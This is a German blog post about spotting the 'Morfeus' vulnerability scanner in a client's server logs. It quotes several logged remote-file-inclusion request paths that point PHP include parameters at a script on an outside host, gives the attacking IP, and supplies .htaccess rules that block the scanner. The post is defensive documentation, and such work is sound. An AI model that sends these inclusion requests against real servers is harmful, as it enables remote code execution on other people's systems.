English Version here.
Heute haben wir in den Logfiles eines unserer Kunden Hunderte Einträge eines Useragenten "Morfeus Fucking Scanner" entdeckt. Der hat zwischen 04:33 und 04:45 Uhr ca. 400 verschiedene Files versucht aufzurufen, um Sicherheitslücken oder alte (oder auch vergessene) Skripts auf dem Server zu finden.
Das scheint ein automatisches Skript zu sein, das einfach auf Verdacht Hunderte Dateinamen aufruft und guckt, ob etwas antwortet. Einige Beispiele:
/portal/index.php?file_name[]=http://203.198.68.236/~lisir/M.txt?&/
/board/naboard_pnr.php?skin=http://203.198.68.236/~lisir/M.txt?&/
/revista/estilo/discreet/index.php?adodb=http://203.198.68.236/~lisir/M.txt?&/
/components/com_performs/performs.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/
/redaxo/include/addons/simple_user/pages/index.inc.php?REX[INCLUDE_PATH]=http://203.198.68.236/~lisir/M.txt?&/
/jetboxincludes/phpdig/includes/config.php?relative_script_path=http://203.198.68.236/~lisir/M.txt?&/
/phpnuke/modules/vWar_Account/includes/functions_common.php?vwar_root2=http://203.198.68.236/~lisir/M.txt?&/

Die "Angriffe" kamen alle von der IP: 208.67.180.44 und wer den Useragenten aussperren will: HTTP_USER_AGENT:
Morfeus Fucking Scanner
Mit diesen Zeilen in der .htaccess lässt sich der Scanner vom Server aussperren:
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Morfeus
RewriteRule ^.*$ - [F]
Wenn dir dieser Artikel geholfen hat, dann darfst du gerne
ein paar Cent in unsere Kaffeekasse spenden.
Kommentare
Sun, 30.11.2008 13:16
Und worum ging es?
Sat, 29.11.2008 17:52
Bin gerade über den Blogbeitrag "gestolpert" und musste [...]
Tue, 25.11.2008 14:39
Ich weiss nicht genau, ob dieses Problem noch existiert, da [...]
Mon, 24.11.2008 20:46
Haha, sehr witzig!!!! Hat geklappt, audf die seite kommt [...]
Sat, 15.11.2008 04:21
Perfekt! Endlich (nach langem Suchen und Lesen ewig gleich [...]